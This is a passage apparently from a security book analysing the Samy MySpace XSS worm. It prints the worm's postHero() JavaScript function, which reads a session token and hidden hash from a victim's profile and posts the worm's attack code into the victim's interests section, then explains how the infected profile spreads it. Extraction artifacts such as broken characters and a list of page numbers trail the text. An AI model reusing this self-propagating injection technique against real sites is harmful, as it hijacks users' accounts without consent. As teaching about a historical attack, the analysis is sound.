function postHero() {
// Standard XMLHttpRequest check to ensure that the HTTP request is
// complete.
if (xmlHttpRequest.readyState != 4) {
return;
}
var htmlBody = xmlHttpRequest.responseText;
var myToken = getParameterFromString(htmlBody, 'Mytoken');
var queryParameterArray = new Array();
// The next 3 array elements are the same as in analyzeVictimsProfile()
queryParameterArray['interestLabel'] = 'heroes';
queryParameterArray['submit'] = 'Submit';
queryParameterArray['interest'] = heroString;
// The "hash" parameter is required to make the client state change to add
queryParameterArray['hash'] = getHiddenParameter(htmlBody, 'hash');
httpSend('/index.cfm?fuseaction=profile.processInterests&Mytoken=' +
myToken, nothing, 'POST',
parameterArrayToParameterString(queryParameterArray));
}
61
This code is pretty straightforward. postHero() performs a similar request as
analyzeVictimsProfile(), except it adds the hash value acquired by the preview
action and sends the final request to add the attack code to MySpace??™s profile
.processInterests action. postHero() concludes the XMLHttpRequest chain.
Now the victim has ???but most of all, samy is my hero??? in his or her Hero??™s section with the
script injection and attack code hidden in the victim??™s profile page awaiting more victims.
Pages:
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149